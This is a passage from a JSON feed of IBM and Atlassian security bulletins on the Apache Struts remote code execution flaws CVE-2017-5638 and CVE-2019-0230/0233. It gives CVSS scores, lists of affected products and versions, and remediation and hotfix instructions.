\n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.5.0| **_9.5.0-SFP2_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP3_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP5_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0-SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0-SFP6_**| [_http://www-933.ibm.com/support/fixcentral/options_](<http://www-933.ibm.com/support/fixcentral/options>) **_Select appropriate VRMF_** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T20:09:19", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by a 
vulnerability (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-16T20:09:19", "id": "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "href": "https://www.ibm.com/support/pages/node/558281", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T18:17:25", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of SAN Volume Controller, Storwize family and FlashSystem V9000 products allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. 
\nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \n \nAll products are affected when running supported releases 7.1 to 7.8. For unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of the product.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest SAN Volume Controller Code_](<http://www-01.ibm.com/support/docview.wss?rs=591&uid=ssg1S1001707>) \n[_Latest Storwize V7000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003705>) \n[_Latest Storwize V5000 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004336>) \n[_Latest Storwize V3700 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004172>) \n[_Latest Storwize V3500 Code_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004171>) \n \nFor IBM FlashSystem V9000, upgrade to the following code levels or higher: \n \n7.6.1.8 \n7.7.1.6 \n7.8.1.0 \n \n[_Latest FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>)\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have 
access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects SAN Volume Controller, Storwize family and FlashSystem V9000 products (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-03-29T01:48:02", "id": "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "href": "https://www.ibm.com/support/pages/node/697171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:34", "description": "## Summary\n\nAn Apache Struts vulnerability was addressed by IBM Social Media Analytics.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. 
An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Social Media Analytics version 1.3\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the following interim fix: \n[IBM Social Media Analytics 1.3.0 IF19](<http://www.ibm.com/support/docview.wss?uid=swg24043514>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:50:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM Social Media Analytics (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-15T22:50:04", "id": "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "href": 
"https://www.ibm.com/support/pages/node/558271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2020-08-21T03:44:55", "description": "h3. Issue Summary\r\nRecently, Apache released the following report regarding two different vulnerabilities in Struts 2:\r\n\r\n[|https://struts.apache.org/announce.html#a20200813]\r\n\r\nIs Confluence affected by these CVEs?\r\n\r\nh3. Steps to Reproduce\r\n Not applicable.\r\n\r\nh3. Expected Results\r\n Not applicable\r\n\r\nh3. Actual Results\r\n Not applicable\r\n\r\nh3. Workaround\r\n Not applicable\r\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-18T13:48:36", "type": "atlassian", "title": "Struts 2 CVE-2019-0230 and CVE-2019-0233 impact on Confluence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0233", "CVE-2019-0230"], "modified": "2020-08-21T00:02:20", "id": "ATLASSIAN:CONFSERVER-60189", "href": "https://jira.atlassian.com/browse/CONFSERVER-60189", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T19:34:34", "description": "*Description*\r\n\r\nBamboo used a version of 
Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. Attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo\r\n\r\n*Affected versions:*\r\n * All versions of Bamboo\u00a0from *5.1.0*\u00a0before *5.14.5*\u00a0(the fixed version for 5.14.x) and from *5.15.0* but less than *5.15.3* (the fixed version for\u00a05.15.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Bamboo*\u00a05.15.3 is available for download from [https://www.atlassian.com/software/bamboo/download].\r\n * *Bamboo*\u00a05.14.5 is available for download from [https://www.atlassian.com/software/bamboo/download-archives].\r\n\r\n*Hotfix:*\r\n The preferred fix is to upgrade your Bamboo using one of the links from the *Fix* section. If you cannot schedule an upgrade immediately, you can replace the affected library as a temporary workaround.\r\n * *Bamboo* 5.9.x, 5.10.x, 5.11.x, 5.12.x - use\u00a0[^struts2-core-2.3.16.3-atlassian-7.jar]\r\n * *Bamboo* 5.13.x - use\u00a0[^struts2-core-2.5.1-atlassian-11.jar] (this jar has struts2 version 2.5.1 with the same fix applied in version 2.5.10.1)\r\n\r\nTo replace the library, remove the existing struts2-core library from $BAMBOO_DIR/WEB-INF/lib, replace it with one matching your Bamboo version and restart your Bamboo server. 
This temporary solution is provided only for your convenience and an upgrade to an official Bamboo release should be scheduled as soon as possible.\r\n\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/_slDN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T04:57:51", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2019-08-19T02:05:22", "id": "BAM-18242", "href": "https://jira.atlassian.com/browse/BAM-18242", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:48", "description": "*Description*\r\n Crowd used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. 
Attackers can use this vulnerability to execute\u00a0Java code of their choice on systems that have a vulnerable version of Crowd.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd\u00a0*from 2.8.3* before *2.9.7* (the fixed version for 2.9.x), from version *2.10.1* before *2.10.3* (the fixed version for 2.10.x) and from version *2.11.0*\u00a0before *2.11.1*\u00a0(the fixed version for 2.11.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Crowd* 2.11.1 is available for download from [https://www.atlassian.com/software/crowd/download].\r\n * *Crowd* 2.10.3 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n * *Crowd* 2.9.7 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n\r\n\u00a0*Hotfix:*\r\nThe preferred fix is to upgrade Crowd to a version that's not vulnerable (see the *Fix* section). If you cannot schedule an upgrade immediately, and are using Crowd 2.10 or 2.11, you can replace the affected library as a temporary workaround.\r\n\r\nTo replace the library:\r\n# Stop Crowd\r\n# Download [struts2-core-2.3.32.jar|https://maven.atlassian.com/content/groups/public/org/apache/struts/struts2-core/2.3.32/struts2-core-2.3.32.jar]\r\n# Remove all existing copies of struts2-core-2.3.29.jar:\r\n{code}\r\n./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n{code}\r\n# Copy the downloaded struts2-core-2.3.32.jar into each of the lib/ directories you removed the jar from\r\n# Restart Crowd\r\n\r\nThis temporary solution is provided only for your convenience and an upgrade to an official Crowd release should be scheduled as soon as possible.\r\n\r\nFor additional details see the [full 
advisory|https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-10T04:31:09", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-24T05:01:02", "id": "ATLASSIAN:CWD-4879", "href": "https://jira.atlassian.com/browse/CWD-4879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:00:12", "description": "*Description*\r\n Crowd used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. 
Attackers can use this vulnerability to execute\u00a0Java code of their choice on systems that have a vulnerable version of Crowd.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd\u00a0*from 2.8.3* before *2.9.7* (the fixed version for 2.9.x), from version *2.10.1* before *2.10.3* (the fixed version for 2.10.x) and from version *2.11.0*\u00a0before *2.11.1*\u00a0(the fixed version for 2.11.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Crowd* 2.11.1 is available for download from [https://www.atlassian.com/software/crowd/download].\r\n * *Crowd* 2.10.3 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n * *Crowd* 2.9.7 is available for download from [https://www.atlassian.com/software/crowd/download-archive].\r\n\r\n\u00a0*Hotfix:*\r\nThe preferred fix is to upgrade Crowd to a version that's not vulnerable (see the *Fix* section). If you cannot schedule an upgrade immediately, and are using Crowd 2.10 or 2.11, you can replace the affected library as a temporary workaround.\r\n\r\nTo replace the library:\r\n# Stop Crowd\r\n# Download [struts2-core-2.3.32.jar|https://maven.atlassian.com/content/groups/public/org/apache/struts/struts2-core/2.3.32/struts2-core-2.3.32.jar]\r\n# Remove all existing copies of struts2-core-2.3.29.jar:\r\n{code}\r\n./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar\r\n{code}\r\n# Copy the downloaded struts2-core-2.3.32.jar into each of the lib/ directories you removed the jar from\r\n# Restart Crowd\r\n\r\nThis temporary solution is provided only for your convenience and an upgrade to an official Crowd release should be scheduled as soon as possible.\r\n\r\nFor additional details see the [full 
advisory|https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-10T04:31:09", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-24T05:01:02", "id": "CWD-4879", "href": "https://jira.atlassian.com/browse/CWD-4879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:47", "description": "*Description*\r\n\r\nBamboo used a version of Struts 2 that was vulnerable to\u00a0[CVE-2017-5638|https://cwiki.apache.org/confluence/display/WW/S2-045]. 
Attackers can use this vulnerability to execute Java code of their choice on systems that have a vulnerable version of Bamboo\r\n\r\n*Affected versions:*\r\n * All versions of Bamboo\u00a0from *5.1.0*\u00a0before *5.14.5*\u00a0(the fixed version for 5.14.x) and from *5.15.0* but less than *5.15.3* (the fixed version for\u00a05.15.x)\u00a0are affected by this vulnerability.\r\n\r\n*Fix:*\r\n * *Bamboo*\u00a05.15.3 is available for download from [https://www.atlassian.com/software/bamboo/download].\r\n * *Bamboo*\u00a05.14.5 is available for download from [https://www.atlassian.com/software/bamboo/download-archives].\r\n\r\n*Hotfix:*\r\n The preferred fix is to upgrade your Bamboo using one of the links from the *Fix* section. If you cannot schedule an upgrade immediately, you can replace the affected library as a temporary workaround.\r\n * *Bamboo* 5.9.x, 5.10.x, 5.11.x, 5.12.x - use\u00a0[^struts2-core-2.3.16.3-atlassian-7.jar]\r\n * *Bamboo* 5.13.x - use\u00a0[^struts2-core-2.5.1-atlassian-11.jar] (this jar has struts2 version 2.5.1 with the same fix applied in version 2.5.10.1)\r\n\r\nTo replace the library, remove the existing struts2-core library from $BAMBOO_DIR/WEB-INF/lib, replace it with one matching your Bamboo version and restart your Bamboo server. 
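Both Atlassian hotfixes come down to the same question an operator has to answer before and after patching: which struts2-core jar is actually on disk under each WEB-INF/lib, and does its version fall inside an affected range? The script below is an added example, not Atlassian's or Apache's code. It walks a tree for struts2-core-*.jar, parses the version from the file name and compares it against the affected ranges quoted on this page; the first unaffected versions for CVE-2020-17530 (2.5.26) and CVE-2021-31805 (2.5.30) are inferred from the "affected up to" boundaries and are assumptions. The sample paths are constructed from the Crowd advisory. It also carries the caveat the Bamboo hotfix itself raises: a vendor build such as struts2-core-2.5.1-atlassian-11.jar carries a backported fix, so a version number alone cannot clear it, and the script marks such jars CHECK rather than VULNERABLE.

```python
"""Inventory struts2-core jars and compare their versions against the
affected ranges quoted in the advisories on this page.

Added example; not Atlassian's or Apache's code.  Affected ranges come from
the bulletins above.  The upper bounds for CVE-2020-17530 (2.5.26) and
CVE-2021-31805 (2.5.30) are inferred from "affected up to 2.5.25 / 2.5.29"
and are assumptions.
"""
import os
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# struts2-core-<version>[-<vendor qualifier>].jar, e.g.
# struts2-core-2.3.29.jar or struts2-core-2.5.1-atlassian-11.jar
JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)+)(?:-([\w.-]+))?\.jar$")

Version = Tuple[int, ...]

# (CVE, lowest affected version, first unaffected version)
RULES = [
    ("CVE-2017-5638", (2, 3, 0), (2, 3, 32)),     # S2-045: 2.3.x before 2.3.32
    ("CVE-2017-5638", (2, 5, 0), (2, 5, 10, 1)),  # S2-045: 2.5.x before 2.5.10.1
    ("CVE-2019-0230", (2, 0, 0), (2, 5, 22)),     # S2-059: 2.0.0 - 2.5.20, fixed 2.5.22
    ("CVE-2020-17530", (2, 0, 0), (2, 5, 26)),    # S2-061: 2.0.0 - 2.5.25 (bound assumed)
    ("CVE-2021-31805", (2, 0, 0), (2, 5, 30)),    # 2.0.0 - 2.5.29 (bound assumed)
]


@dataclass
class Finding:
    path: str
    version: Version
    vendor_build: Optional[str]        # e.g. "atlassian-11" for a backported build
    cves: List[str] = field(default_factory=list)

    @property
    def status(self) -> str:
        if not self.cves:
            return "OK"
        # A vendor build may carry a backported fix (the Bamboo hotfix jars do),
        # so the version number alone cannot clear or condemn it.
        return "CHECK" if self.vendor_build else "VULNERABLE"


def parse_version(text: str) -> Version:
    return tuple(int(part) for part in text.split("."))


def classify(path: str) -> Optional[Finding]:
    """Return a Finding for a struts2-core jar path, or None for other files."""
    match = JAR_RE.match(os.path.basename(path))
    if not match:
        return None
    version = parse_version(match.group(1))
    cves = sorted({cve for cve, low, high in RULES if low <= version < high})
    return Finding(path, version, match.group(2), cves)


def scan_paths(paths: List[str]) -> List[Finding]:
    return [f for f in map(classify, paths) if f is not None]


def scan_tree(root: str) -> List[Finding]:
    """Walk a deployment directory (e.g. the Crowd install root) for jars."""
    paths = [os.path.join(d, name) for d, _, files in os.walk(root) for name in files]
    return scan_paths(sorted(paths))


def report(findings: List[Finding]) -> List[str]:
    lines = []
    for f in findings:
        version = ".".join(map(str, f.version))
        detail = ", ".join(f.cves) if f.cves else "no affected range matched"
        if f.vendor_build:
            detail += f"; vendor build '{f.vendor_build}' may be backported, confirm with vendor"
        lines.append(f"{f.status:<11}{f.path} ({version}) {detail}")
    return lines


if __name__ == "__main__":
    # Constructed sample: the four jars the Crowd advisory says to remove,
    # the replacement jar, and one of the Bamboo hotfix builds.
    sample = [
        "./crowd-openidclient-webapp/WEB-INF/lib/struts2-core-2.3.29.jar",
        "./crowd-openidserver-webapp/WEB-INF/lib/struts2-core-2.3.29.jar",
        "./crowd-webapp/WEB-INF/lib/struts2-core-2.3.29.jar",
        "./demo-webapp/WEB-INF/lib/struts2-core-2.3.29.jar",
        "./crowd-webapp/WEB-INF/lib/struts2-core-2.3.32.jar",
        "./bamboo/WEB-INF/lib/struts2-core-2.5.1-atlassian-11.jar",
        "./crowd-webapp/WEB-INF/lib/commons-io-2.4.jar",
    ]
    print("\n".join(report(scan_paths(sample))))
```

In the field, call scan_tree() on the install root rather than the constructed list; the point of the CHECK state is that the 2.3.32 jar the Crowd hotfix installs still falls inside the later S2-059 and S2-061 ranges, so a jar swap for one bulletin is never the end of the inventory.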
This temporary solution is provided only for your convenience and an upgrade to an official Bamboo release should be scheduled as soon as possible.\r\n\r\n\r\nFor additional details see the [full advisory|https://confluence.atlassian.com/x/_slDN].", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-03-10T04:57:51", "type": "atlassian", "title": "Apache Struts 2 Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2019-08-19T02:05:22", "id": "ATLASSIAN:BAM-18242", "href": "https://jira.atlassian.com/browse/BAM-18242", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:37", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": 
